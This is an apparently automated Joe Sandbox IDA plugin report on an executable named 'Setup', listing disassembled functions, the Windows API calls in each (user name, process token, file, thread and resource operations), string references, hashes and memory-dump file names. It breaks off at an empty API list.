Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
String ID: &_'
API String ID: 1566822279-2411122644
Opcode ID: 2f7437717cf3f580f105afbd06e10356108cdf2a8b09e617bb7e777e24f8249c
Instruction ID: a269a489c0637bb41762b69e043e27b761a28aec5a97ec57a6af3e482f749446
Opcode Fuzzy Hash: 2f7437717cf3f580f105afbd06e10356108cdf2a8b09e617bb7e777e24f8249c
Instruction Fuzzy Hash: CA310870A047099BDF20DF94CD49BEEBBF8FB09324F200259E924B62D0D7759A44DBA4

Function 00860ED0 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 615COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0086141A
/i , xrefs: 008614E7
&_', xrefs: 00860EE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FindResource
String ID: /i $\\?\$&_'
API String ID: 1635176832-2315298151
Opcode ID: 4fb7da9d17aec177e8379fb23de19cbf7bd16df19218a73e1b936ee529c333f7
Instruction ID: 29d26b9f21762df481dddab27c8129cbebc444a6a4a7101ff5a93073a2a8ccfe
Opcode Fuzzy Hash: 4fb7da9d17aec177e8379fb23de19cbf7bd16df19218a73e1b936ee529c333f7
Instruction Fuzzy Hash: 92328B30A00609DFDF08DFA8C859BADB7B5FF44324F194259E826E7291DB74A946CF81

Function 00860580 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 008882B0: GetUserNameW.ADVAPI32(?,?), ref: 0088832B
Part of subcall function 008882B0: GetLastError.KERNEL32 ref: 00888335
Part of subcall function 008882B0: GetUserNameW.ADVAPI32(?,?), ref: 0088837D
Part of subcall function 008882B0: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 008883B7
Part of subcall function 008882B0: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 00888402

GetCurrentProcess.KERNEL32(00000008,?,?,?,?), ref: 00860895
OpenProcessToken.ADVAPI32(00000000), ref: 0086089C
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 008608CB
CloseHandle.KERNEL32(00000000), ref: 008608E0

Strings

&_', xrefs: 00860594
\/:*?"<>|, xrefs: 00860661

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: EnvironmentNameProcessTokenUserVariable$CloseCurrentErrorHandleInformationLastOpen
String ID: \/:*?"<>|$&_'
API String ID: 3139386598-2101678004
Opcode ID: 1c789c1d28d989fd39bf81ea8114666cb0b3e2e58a872fc9a6ce910ff5229bea
Instruction ID: 98f67e08284cab8db2a32ca7b1e6fc590e99fee07217341efa6b693a8591d33e
Opcode Fuzzy Hash: 1c789c1d28d989fd39bf81ea8114666cb0b3e2e58a872fc9a6ce910ff5229bea
Instruction Fuzzy Hash: 0BC1C731A00398DFDB14DFA8C854BAEBBB1FF55304F240269E409AB292DB706A45CF95

Function 0084EFD0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 217COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(00000000,?,275F26E1,?,?,?,?,0094A9E5,000000FF,?,008642DF,?,00000000,275F26E1,?,00000010), ref: 0084F035
GetFileVersionInfoW.KERNELBASE(00000000,?,00000000,008642DF,00000000,?,?,?,?,0094A9E5,000000FF,?,008642DF,?,00000000,275F26E1), ref: 0084F083

Strings

\VarFileInfo\Translation, xrefs: 0084F0C5
\StringFileInfo\%04x%04x\%s, xrefs: 0084F0FB
ProductName, xrefs: 0084F0F1
&_', xrefs: 0084EFE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FileInfoVersion$Size
String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation$&_'
API String ID: 2104008232-4273781222
Opcode ID: b02053c96fe88859b877345b071ac6b120a3dc046f56f5883733c0734f87c899
Instruction ID: c87283613f7cca43a08fb25449d7ad6d9442aca896fe239c21e4af8497391d5e
Opcode Fuzzy Hash: b02053c96fe88859b877345b071ac6b120a3dc046f56f5883733c0734f87c899
Instruction Fuzzy Hash: FC71BD70A04249DFCB05DFA8C885AAEBBB8FF45314F14816DE611E7292DB34AD05CBA1

Function 0088F480 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 175synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,275F26E1,00000000,?,?,?,?,?,?,?,?,00000000,00993FCD), ref: 0088F4BD
CreateThread.KERNEL32(00000000,00000000,Function_001AF890,?,00000000,?), ref: 0088F50D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0088F637

Strings

&_', xrefs: 0088F497

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Create$EventObjectSingleThreadWait
String ID: &_'
API String ID: 1077646455-2411122644
Opcode ID: f7aebdb6d7609fec9c10f107e52476f0388cdb0648bd5d2f416c5bec181729dc
Instruction ID: c5632004b0f77becc70b041e3665d7fe77dda5f658ee23b365b125a5de69bd29
Opcode Fuzzy Hash: f7aebdb6d7609fec9c10f107e52476f0388cdb0648bd5d2f416c5bec181729dc
Instruction Fuzzy Hash: 9E615875A042199FCF14DF98C980BAEB7B1FF88724F258269E915AB391D730AD41CB90

Function 006FBDA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 006FBE4F
GetWindowLongW.USER32(?,000000FC), ref: 006FBE5E
CallWindowProcW.USER32(?,?,00000082,?,?), ref: 006FBE79
GetWindowLongW.USER32(?,000000FC), ref: 006FBE93
SetWindowLongW.USER32(?,000000FC,?), ref: 006FBEA5

Strings

$, xrefs: 006FBDD1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 00d49b1110d83a0cae2dc06b36eed6b0805e2ab16e0d32a6e55468d5684ef0fb
Instruction ID: f336283f24e47025e0c739a1ac65938c91cbd0fc91468ecfbb48a887eb917496
Opcode Fuzzy Hash: 00d49b1110d83a0cae2dc06b36eed6b0805e2ab16e0d32a6e55468d5684ef0fb
Instruction Fuzzy Hash: F04149B5608306AFC700CF59D884A6AFBF5FF88360F104A19FA9483660C772A895CF91

Function 00869B80 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(00000010,275F26E1,?,00000010,?), ref: 00869EBE

Part of subcall function 0083F660: GetCurrentProcess.KERNEL32 ref: 0083F6B2
Part of subcall function 0083F660: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0083F6BF
Part of subcall function 0083F660: GetLastError.KERNEL32 ref: 0083F6C9
Part of subcall function 0083F660: CloseHandle.KERNEL32(00000000), ref: 0083F7AC

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

Strings

\\?\, xrefs: 00869ECB
Extraction path set to:, xrefs: 00869F21
&_', xrefs: 00869B97
[WindowsVolume], xrefs: 00869C1C, 00869C2E, 00869C38

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Process$CloseCurrentErrorFindHandleHeapLastOpenPathResourceToken
String ID: Extraction path set to:$[WindowsVolume]$\\?\$&_'
API String ID: 1971330335-370492263
Opcode ID: 9d3bb844067b1301fc87b5cae0882bf5665ceba8d822e647cef970d0b4d63d68
Instruction ID: 7c5e5567e1362d07b51cbc3dbedc4cd7c50b45af39f4ca4220d077a6f24194db
Opcode Fuzzy Hash: 9d3bb844067b1301fc87b5cae0882bf5665ceba8d822e647cef970d0b4d63d68
Instruction Fuzzy Hash: 3ED19F30A006099BCB05DBA8C854BADB7B9FF44324F16425DE965EB3D1DB74AE01CB91

Function 0085FDF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,275F26E1,?,00000010,?,00864350,000000FF), ref: 0085FE56
SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 0085FE9F
ReadFile.KERNEL32(00000000,275F26E1,?,000000FF,00000000,00000078,?), ref: 0085FEE1
CloseHandle.KERNEL32(00000000), ref: 0085FF78

Strings

&_', xrefs: 0085FE07

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$CloseCreateHandlePointerRead
String ID: &_'
API String ID: 4133201480-2411122644
Opcode ID: 4ffe4d21a24ca95fdbb442b5bf77dc9d34edf0efa21eada1856ddfafc78b600f
Instruction ID: 746f0e6ca7ae8ef255ead8c937dcba0b1bc9346b8797d24ae1d9192d89eb62b4
Opcode Fuzzy Hash: 4ffe4d21a24ca95fdbb442b5bf77dc9d34edf0efa21eada1856ddfafc78b600f
Instruction Fuzzy Hash: B951B271A052099BDB10CB98DC49BAEBBB8FF05325F148259F921E73D1CB749D09CBA0

Function 00869820 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,275F26E1), ref: 008698FD
GetLastError.KERNEL32(?,275F26E1), ref: 00869905
RemoveDirectoryW.KERNEL32(?,275F26E1), ref: 00869965
GetLastError.KERNEL32 ref: 0086996D

Strings

&_', xrefs: 00869837

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLast$DeleteDirectoryFileRemove
String ID: &_'
API String ID: 50330452-2411122644
Opcode ID: 10e4f68871aa7cd62cffe1510d94464e9452171575b84bfcff3f7c3ed1664085
Instruction ID: 574f45710bc7959d103eb50e97e27ee4b401ee810490a3c7aab48378d71ac1ac
Opcode Fuzzy Hash: 10e4f68871aa7cd62cffe1510d94464e9452171575b84bfcff3f7c3ed1664085
Instruction Fuzzy Hash: 555183319042299FCF11DF98D899BEEBBB8FF01304F164469D845EB291D734A949CB92

Function 0084EEC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0084E970: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,275F26E1,00000000,00000000,?), ref: 0084E9CB

GetFileVersionInfoSizeW.KERNELBASE(?,00000000,?,275F26E1,00000000,?,?,?,?,00000000,009880E5,000000FF,00000000,0084EE76,?), ref: 0084EF0D
GetFileVersionInfoW.KERNELBASE(?,00000000,009880E5,00000000,00000000,?,?,00000000,009880E5,000000FF,00000000,0084EE76,?), ref: 0084EF39
GetLastError.KERNEL32(?,?,00000000,009880E5,000000FF,00000000,0084EE76,?), ref: 0084EF7E
DeleteFileW.KERNEL32(?), ref: 0084EF91

Strings

&_', xrefs: 0084EED7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
String ID: &_'
API String ID: 2825328469-2411122644
Opcode ID: edca2715dc48eeab96938a7eafa35327f52722a397f7a6b450db8c1f7bd58971
Instruction ID: 0312608950946e3e89275f1be05b5c47081ca4f600cf7066b0fe00daabc005fe
Opcode Fuzzy Hash: edca2715dc48eeab96938a7eafa35327f52722a397f7a6b450db8c1f7bd58971
Instruction Fuzzy Hash: B9315EB1A05209ABDB11CFA5CD44BEEFBB8FF48354F14455AE805E3290DB349A45CBA1

Function 00845CC0 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjectsEx.USER32(00000001,000000FF,000000FF,000005FF,00000004), ref: 00845CD7
PeekMessageW.USER32(?,00000000), ref: 00845D08
TranslateMessage.USER32(00000000), ref: 00845D17
DispatchMessageW.USER32(00000000), ref: 00845D22
MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00845D38

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
String ID:
API String ID: 4084795276-0
Opcode ID: fa472a769a612ee15bc4d5548f862f4bd60ddcf01f5846200544057b2e549850
Instruction ID: 2f2652de298f0ba111983d72e6a47c30b93156edd2f65d24e2bc3cb9069adb37
Opcode Fuzzy Hash: fa472a769a612ee15bc4d5548f862f4bd60ddcf01f5846200544057b2e549850
Instruction Fuzzy Hash: CA01B170A447057BF720CF90CD49BAAB7ECFF49B10F508629BA28D90C0E774D6858B12

Function 00844F70 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 389COMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

PathIsUNCW.SHLWAPI(?,?), ref: 0084513D

Strings

&_', xrefs: 00844F87, 00845397
\\?\, xrefs: 0084511F, 00845125
\\?\UNC\, xrefs: 00845019, 008450A1, 008450A7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: HeapPathProcess
String ID: \\?\$\\?\UNC\$&_'
API String ID: 300331711-2560974149
Opcode ID: 1d50a94d818b2346e58f61e1e50641f82b4c5e2e55ddb17f920276baf0359383
Instruction ID: a3105b9fb1cafa4f9c6d6b44854e213c5bad486fcecb0c8b0f864232d36aa017
Opcode Fuzzy Hash: 1d50a94d818b2346e58f61e1e50641f82b4c5e2e55ddb17f920276baf0359383
Instruction Fuzzy Hash: CFD1B071A006099BDF04DBA8CC95BAEB7B9FF48324F144169E521E73C2DB74AE05CB91

Function 0086A000 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 196fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,275F26E1,00000000,00000010,?,00000010,?), ref: 0086A09B
GetLastError.KERNEL32 ref: 0086A0DD
GetLastError.KERNEL32(?), ref: 0086A181

Strings

&_', xrefs: 0086A017

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLast$CreateFile
String ID: &_'
API String ID: 1722934493-2411122644
Opcode ID: 1ecbe0847ac94c9e312362529a18c52caef6b012281d679e1a4f1ae238349fc5
Instruction ID: 9789d5bf508f608eb7ddf18ef5ed9afd8f87aa0f48daeb768aaf7f8305816ef4
Opcode Fuzzy Hash: 1ecbe0847ac94c9e312362529a18c52caef6b012281d679e1a4f1ae238349fc5
Instruction Fuzzy Hash: 89610031A00A06EFDB18DB68DC45BA9F3A5FF45320F158219E825E73D0DB71B905CB92

Function 00845380 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,275F26E1,00000000,00000000,?,?,00986A65,000000FF,?,0086F653,?,00000000,00000000), ref: 008453CB
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,009E3BC4,00000001), ref: 0084548A
GetLastError.KERNEL32 ref: 00845498

Strings

&_', xrefs: 00844F87, 00845397

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath
String ID: &_'
API String ID: 953296794-2411122644
Opcode ID: c3640031d106f03b3f2a402542477a2699ec4cb9990752f4f4827e0ae1f4c510
Instruction ID: fafec95ba480d5037adbef7adb780c8205d939bbc6220404150784e4a106558c
Opcode Fuzzy Hash: c3640031d106f03b3f2a402542477a2699ec4cb9990752f4f4827e0ae1f4c510
Instruction Fuzzy Hash: 3061CC71A006098FCF05DFA8C889BADF7F1FF08324F158169E421E7292DB34AA05CB91

Function 008A1520 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(008A2521,40000000,00000001,00000000,00000002,00000080,00000000,275F26E1,?,?), ref: 008A1582
WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,0000C800), ref: 008A1628
CloseHandle.KERNEL32(00000000,?,0000C800), ref: 008A169C

Strings

&_', xrefs: 008A1537

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: &_'
API String ID: 1065093856-2411122644
Opcode ID: 743f8816f03a18c7267a245d3278e1839c09be0bb51a5f1a7f076841c53af697
Instruction ID: 2c7d2ffd62a350d8dff75fb439a526dfb52a14805139af220423151b5c1323df
Opcode Fuzzy Hash: 743f8816f03a18c7267a245d3278e1839c09be0bb51a5f1a7f076841c53af697
Instruction Fuzzy Hash: 40518B71A01208AFEF10DFA8DD49BEEBBB9FF45314F244119E811A7290DB759E00CBA4

Function 0092BF8D Relevance: 6.1, APIs: 4, Instructions: 83memorylibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

